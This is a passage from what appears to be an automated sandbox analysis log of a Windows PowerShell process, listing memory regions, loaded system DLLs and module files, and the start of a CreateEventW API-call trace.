= "" Region: id = 1199 start_va = 0x5e30000 end_va = 0x5e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e30000" filename = "" Region: id = 1200 start_va = 0x5e80000 end_va = 0x5ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e80000" filename = "" Region: id = 1201 start_va = 0x7ef80000 end_va = 0x7ef82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 1202 start_va = 0x44c0000 end_va = 0x44cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 1203 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1204 start_va = 0x220000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1205 start_va = 0x5040000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005040000" filename = "" Region: id = 1206 start_va = 0x5b40000 end_va = 0x5b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b40000" filename = "" Region: id = 1207 start_va = 0x6080000 end_va = 0x617ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006080000" filename = "" Region: id = 1210 start_va = 0x5dd0000 end_va = 0x5e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005dd0000" filename = "" Region: id = 1211 start_va = 0x5e80000 end_va = 0x5ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e80000" filename = "" Region: id = 1212 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 1213 start_va = 0x210000 end_va = 0x210fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bitstransfer.psd1" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1") Region: id = 1214 start_va = 0x74db0000 end_va = 0x74db7fff monitored = 0 entry_point = 0x74db3bf5 region_type = mapped_file name = "msisip.dll" filename = "\\Windows\\SysWOW64\\msisip.dll" (normalized: "c:\\windows\\syswow64\\msisip.dll") Region: id = 1215 start_va = 0x6180000 end_va = 0x657ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006180000" filename = "" Region: id = 1216 start_va = 0x220000 end_va = 0x220fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bitstransfer.psd1" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1") Region: id = 1217 start_va = 0x6180000 end_va = 0x657ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006180000" filename = "" Region: id = 1218 start_va = 0x4a40000 end_va = 0x4a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a40000" filename = "" Region: id = 1219 start_va = 0x5b20000 end_va = 0x5b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b20000" filename = "" Region: id = 1220 start_va = 0x74d90000 end_va = 0x74da5fff monitored = 0 entry_point = 0x74d913df region_type = mapped_file name = "wshext.dll" filename = "\\Windows\\SysWOW64\\wshext.dll" (normalized: "c:\\windows\\syswow64\\wshext.dll") Region: id = 1221 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 1222 start_va = 0x6b240000 end_va = 0x6b2c3fff monitored = 0 entry_point = 0x6b2419a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1223 start_va = 0x4930000 end_va = 0x496ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004930000" filename = "" Region: id = 1224 start_va = 0x74dc0000 end_va = 0x74dc9fff monitored = 0 entry_point = 0x74dc4ab0 region_type = mapped_file name = "pwrshsip.dll" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\pwrshsip.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\pwrshsip.dll") Region: id = 1225 start_va = 0x210000 end_va = 0x210fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.management.psd1" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1") Region: id = 1226 start_va = 0x6180000 end_va = 0x657ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006180000" filename = "" Region: id = 1227 start_va = 0x220000 end_va = 0x220fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.management.psd1" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1") Region: id = 1228 start_va = 0x6180000 end_va = 0x657ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006180000" filename = "" Region: id = 1229 start_va = 0x6b060000 end_va = 0x6b236fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Pae3498d9#\\ade0afceac1317e3668a9c8086d8d18b\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.pae3498d9#\\ade0afceac1317e3668a9c8086d8d18b\\microsoft.powershell.commands.management.ni.dll") Region: id = 1230 start_va = 0x5fe0000 end_va = 0x601ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fe0000" filename = "" Region: id = 1231 start_va = 0x6040000 end_va = 0x607ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006040000" filename = "" Region: id = 1232 start_va = 0x6210000 end_va = 0x624ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006210000" filename = "" Region: id = 1233 start_va = 0x7ef80000 end_va = 0x7ef82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 1234 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1235 start_va = 0x220000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 1236 start_va = 0x44c0000 end_va = 0x44cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 1237 start_va = 0x6da80000 end_va = 0x6db03fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.management.infrastructure.native.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.M870d558a#\\7ceb6b903321c16b12386a8df1be50f9\\Microsoft.Management.Infrastructure.Native.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.m870d558a#\\7ceb6b903321c16b12386a8df1be50f9\\microsoft.management.infrastructure.native.ni.dll") Region: id = 1238 start_va = 0x6b040000 end_va = 0x6b051fff monitored = 0 entry_point = 0x6b04cdae region_type = mapped_file name = "microsoft.backgroundintelligenttransfer.management.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.BackgroundIntelligentTransfer.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.BackgroundIntelligentTransfer.Management.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.backgroundintelligenttransfer.management\\1.0.0.0__31bf3856ad364e35\\microsoft.backgroundintelligenttransfer.management.dll") Region: id = 1239 start_va = 0x4550000 end_va = 0x4561fff monitored = 0 entry_point = 0x455cdae region_type = mapped_file name = "microsoft.backgroundintelligenttransfer.management.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.BackgroundIntelligentTransfer.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.BackgroundIntelligentTransfer.Management.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.backgroundintelligenttransfer.management\\1.0.0.0__31bf3856ad364e35\\microsoft.backgroundintelligenttransfer.management.dll") Region: id = 1240 start_va = 0x44d0000 end_va = 0x44dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 1241 start_va = 0x4570000 end_va = 0x4570fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psdiagnostics.psd1" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1") Region: id = 1242 start_va = 0x6250000 end_va = 0x664ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006250000" filename = "" Region: id = 1243 start_va = 0x4860000 end_va = 0x4860fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psdiagnostics.psd1" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1") Region: id = 1244 start_va = 0x6250000 end_va = 0x664ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006250000" filename = "" Region: id = 1245 start_va = 0x4570000 end_va = 0x4575fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "troubleshootingpack.psd1" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.psd1") Region: id = 1246 start_va = 0x4990000 end_va = 0x49cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004990000" filename = "" Region: id = 1247 start_va = 0x5ed0000 end_va = 0x5f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ed0000" filename = "" Region: id = 1248 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 1249 start_va = 0x6250000 end_va = 0x664ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006250000" filename = "" Region: id = 1250 start_va = 0x4860000 end_va = 0x4865fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "troubleshootingpack.psd1" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.psd1") Region: id = 1251 start_va = 0x6250000 end_va = 0x664ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006250000" filename = "" Region: id = 1252 start_va = 0x4570000 end_va = 0x4579fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 1253 start_va = 0x6b000000 end_va = 0x6b037fff monitored = 0 entry_point = 0x6b001489 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 1254 start_va = 0x6afc0000 end_va = 0x6affcfff monitored = 0 entry_point = 0x6afc10f5 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1255 start_va = 0x6afa0000 end_va = 0x6afb6fff monitored = 0 entry_point = 0x6afa1c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1256 start_va = 0x6250000 end_va = 0x644ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006250000" filename = "" Region: id = 1257 start_va = 0x6af80000 end_va = 0x6af95fff monitored = 0 entry_point = 0x6af82061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 1258 start_va = 0x4860000 end_va = 0x486ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004860000" filename = "" Region: id = 1259 start_va = 0x6af70000 end_va = 0x6af7ffff monitored = 0 entry_point = 0x6af7a5ce region_type = mapped_file name = "microsoft.windows.diagnosis.troubleshootingpack.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\6.1.0.0__31bf3856ad364e35\\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.windows.diagnosis.troubleshootingpack\\6.1.0.0__31bf3856ad364e35\\microsoft.windows.diagnosis.troubleshootingpack.dll") Region: id = 1260 start_va = 0x4930000 end_va = 0x493ffff monitored = 0 entry_point = 0x493a5ce region_type = mapped_file name = "microsoft.windows.diagnosis.troubleshootingpack.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\6.1.0.0__31bf3856ad364e35\\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.windows.diagnosis.troubleshootingpack\\6.1.0.0__31bf3856ad364e35\\microsoft.windows.diagnosis.troubleshootingpack.dll") Region: id = 1261 start_va = 0x4960000 end_va = 0x496ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 1262 start_va = 0x6af60000 end_va = 0x6af67fff monitored = 0 entry_point = 0x6af6378e region_type = mapped_file name = "microsoft.windows.diagnosis.sdengine.dll" filename = "\\Windows\\assembly\\GAC_32\\Microsoft.Windows.Diagnosis.SDEngine\\6.1.0.0__31bf3856ad364e35\\Microsoft.Windows.Diagnosis.SDEngine.dll" (normalized: "c:\\windows\\assembly\\gac_32\\microsoft.windows.diagnosis.sdengine\\6.1.0.0__31bf3856ad364e35\\microsoft.windows.diagnosis.sdengine.dll") Region: id = 1263 start_va = 0x4940000 end_va = 0x4947fff monitored = 0 entry_point = 0x494378e region_type = mapped_file name = "microsoft.windows.diagnosis.sdengine.dll" filename = "\\Windows\\assembly\\GAC_32\\Microsoft.Windows.Diagnosis.SDEngine\\6.1.0.0__31bf3856ad364e35\\Microsoft.Windows.Diagnosis.SDEngine.dll" (normalized: "c:\\windows\\assembly\\gac_32\\microsoft.windows.diagnosis.sdengine\\6.1.0.0__31bf3856ad364e35\\microsoft.windows.diagnosis.sdengine.dll") Region: id = 1264 start_va = 0x6ae50000 end_va = 0x6af54fff monitored = 1 entry_point = 0x6ae89680 region_type = mapped_file name = "diasymreader.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\diasymreader.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\diasymreader.dll") Region: id = 1265 start_va = 0x4bb0000 end_va = 0x4beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bb0000" filename = "" Region: id = 1266 start_va = 0x5f00000 end_va = 0x5f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f00000" filename = "" Region: id = 1267 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 1268 start_va = 0x4950000 end_va = 0x495ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004950000" filename = "" Region: id = 1269 start_va = 0x4950000 end_va = 0x495ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004950000" filename = "" Region: id = 1270 start_va = 0x4950000 end_va = 0x495ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004950000" filename = "" Region: id = 1271 start_va = 0x4950000 end_va = 0x495ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004950000" filename = "" Region: id = 1272 start_va = 0x4950000 end_va = 0x495ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004950000" filename = "" Region: id = 1273 start_va = 0x4950000 end_va = 0x495ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004950000" filename = "" Region: id = 1274 start_va = 0x4970000 end_va = 0x49affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004970000" filename = "" Region: id = 1275 start_va = 0x6180000 end_va = 0x61bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006180000" filename = "" Region: id = 1276 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 1277 start_va = 0x4950000 end_va = 0x495ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004950000" filename = "" Region: id = 1278 start_va = 0x4950000 end_va = 0x495ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004950000" filename = "" Region: id = 1279 start_va = 0x4950000 end_va = 0x495ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004950000" filename = "" Region: id = 1280 start_va = 0x49b0000 end_va = 0x49bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 1281 start_va = 0x49b0000 end_va = 0x49bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 1282 start_va = 0x49b0000 end_va = 0x49bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 1283 start_va = 0x49b0000 end_va = 0x49bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 1284 start_va = 0x49b0000 end_va = 0x49bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 1285 start_va = 0x49c0000 end_va = 0x49cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049c0000" filename = "" Region: id = 1286 start_va = 0x49d0000 end_va = 0x49dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 1287 start_va = 0x49e0000 end_va = 0x49effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049e0000" filename = "" Region: id = 1288 start_va = 0x4a30000 end_va = 0x4a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a30000" filename = "" Region: id = 1289 start_va = 0x4b80000 end_va = 0x4b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b80000" filename = "" Region: id = 1290 start_va = 0x4950000 end_va = 0x4950fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004950000" filename = "" Region: id = 1291 start_va = 0x759b0000 end_va = 0x75a32fff monitored = 0 entry_point = 0x759b23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1292 start_va = 0x49b0000 end_va = 0x49b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049b0000" filename = "" Region: id = 1293 start_va = 0x725b0000 end_va = 0x7260efff monitored = 0 entry_point = 0x725b2134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 1294 start_va = 0x6ae20000 end_va = 0x6ae40fff monitored = 0 entry_point = 0x6ae2e356 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 1295 start_va = 0x6ae00000 end_va = 0x6ae11fff monitored = 0 entry_point = 0x6ae01200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1296 start_va = 0x6add0000 end_va = 0x6adf9fff monitored = 0 entry_point = 0x6add13f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 1297 start_va = 0x49c0000 end_va = 0x49cbfff monitored = 0 entry_point = 0x49ce356 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 1298 start_va = 0x49d0000 end_va = 0x49d3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\SysWOW64\\stdole2.tlb" (normalized: "c:\\windows\\syswow64\\stdole2.tlb") Region: id = 1299 start_va = 0x49e0000 end_va = 0x49effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049e0000" filename = "" Region: id = 1300 start_va = 0x49e0000 end_va = 0x49e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049e0000" filename = "" Region: id = 1301 start_va = 0x74130000 end_va = 0x742cdfff monitored = 0 entry_point = 0x7415e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1302 start_va = 0x4a30000 end_va = 0x4a30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1303 start_va = 0x4b80000 end_va = 0x4b81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b80000" filename = "" Region: id = 1304 start_va = 0x6adc0000 end_va = 0x6adc8fff monitored = 0 entry_point = 0x6adc153e region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 1305 start_va = 0x73c40000 end_va = 0x73d34fff monitored = 0 entry_point = 0x73c50d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 1306 start_va = 0x75d50000 end_va = 0x75eecfff monitored = 0 entry_point = 0x75d517e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 1307 start_va = 0x77030000 end_va = 0x77056fff monitored = 0 entry_point = 0x770358b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1308 start_va = 0x75020000 end_va = 0x75031fff monitored = 0 entry_point = 0x75021441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 1309 start_va = 0x4a30000 end_va = 0x4a3cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Region: id = 1310 start_va = 0x740f0000 end_va = 0x74110fff monitored = 0 entry_point = 0x740f145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1311 start_va = 0x75550000 end_va = 0x75594fff monitored = 0 entry_point = 0x755511e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 1312 start_va = 0x4b90000 end_va = 0x4b93fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1313 start_va = 0x4ba0000 end_va = 0x4bbcfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000b.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db") Region: id = 1314 start_va = 0x4bc0000 end_va = 0x4bc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004bc0000" filename = "" Region: id = 1315 start_va = 0x4b90000 end_va = 0x4b93fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1316 start_va = 0x4bd0000 end_va = 0x4bfffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db") Region: id = 1317 start_va = 0x4c00000 end_va = 0x4c03fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1318 start_va = 0x5dc0000 end_va = 0x5e25fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1319 start_va = 0x5eb0000 end_va = 0x5eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005eb0000" filename = "" Region: id = 1320 start_va = 0x6520000 end_va = 0x655ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006520000" filename = "" Region: id = 1321 start_va = 0x7ef1d000 end_va = 0x7ef1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef1d000" filename = "" Region: id = 1322 start_va = 0x4c50000 end_va = 0x4c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c50000" filename = "" Region: id = 1323 start_va = 0x4970000 end_va = 0x49affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004970000" filename = "" Region: id = 1324 start_va = 0x6490000 end_va = 0x64cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006490000" filename = "" Region: id = 1325 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 1326 start_va = 0x49c0000 end_va = 0x49cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049c0000" filename = "" Thread: id = 67 os_tid = 0xf8c [0167.755] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x54c [0167.755] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6ec [0167.755] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x790 [0167.756] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x79c [0167.756] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x798 [0167.756] CreateEventW 